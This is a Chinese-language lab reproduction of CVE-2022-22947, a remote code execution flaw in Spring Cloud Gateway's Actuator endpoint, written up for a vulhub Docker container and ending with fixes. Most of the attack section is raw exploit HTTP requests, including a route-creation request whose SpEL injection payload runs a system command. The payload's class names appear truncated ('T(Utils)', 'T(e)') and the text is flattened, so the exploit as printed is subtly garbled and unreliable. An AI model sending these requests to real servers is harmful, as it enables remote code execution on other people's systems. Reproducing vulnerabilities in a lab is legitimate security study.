2023年6月27日发(作者：)

Spring-Cloud-Gateway-CVE-2022-22947漏洞复现⽬录漏洞描述Spring Cloud Gateway 远程代码执⾏漏洞（CVE-2022-22947）发⽣在Spring Cloud Gateway应⽤程序的Actuator端点，其在启⽤、公开和不安全的情况下容易受到代码注⼊的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执⾏任意远程执⾏的请求影响版本Spring Cloud Gateway 3.1.x < 3.1.1Spring Cloud Gateway < 3.0.7漏洞复现环境搭建1. dokcer pull vulhub/spring-cloud-gateway:3.1.02. docker run -itd -p 5000:8080 --name spring vulhub/spring-cloud-gateway:3.1.03. 最后访问ip:5000过程1. 添加⼀个spel表达式的路由，数据包如下POST /actuator/gateway/routes/xd HTTP/1.1Host: localhost:5000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeAccept-Language: enContent-Type: application/jsonContent-Length: 364{ "id": "xd", "filters": [{ "name": "AddResponseHeader", "args": {"name": "Result","value": "#{new (T(Utils).copyToByteArray(T(e).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"} }], "uri": "", "order": 0 }2. 触发路由⽣效，数据包如下POST /actuator/gateway/refresh HTTP/1.1Host: localhost:5000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 03. 查看执⾏结果，数据包如下GET /actuator/gateway/routes/xd HTTP/1.1Host: localhost:5000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencoded4. 清理路由，数据包如下DELETE /actuator/gateway/routes/xd HTTP/1.1Host: localhost:5000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 05. 重复2，使清除路由⽣效批量url检测漏洞修复1. 升级到安全版本2. 修改Spring配置，禁⽌访问Spring Cloud Gateway actuator端点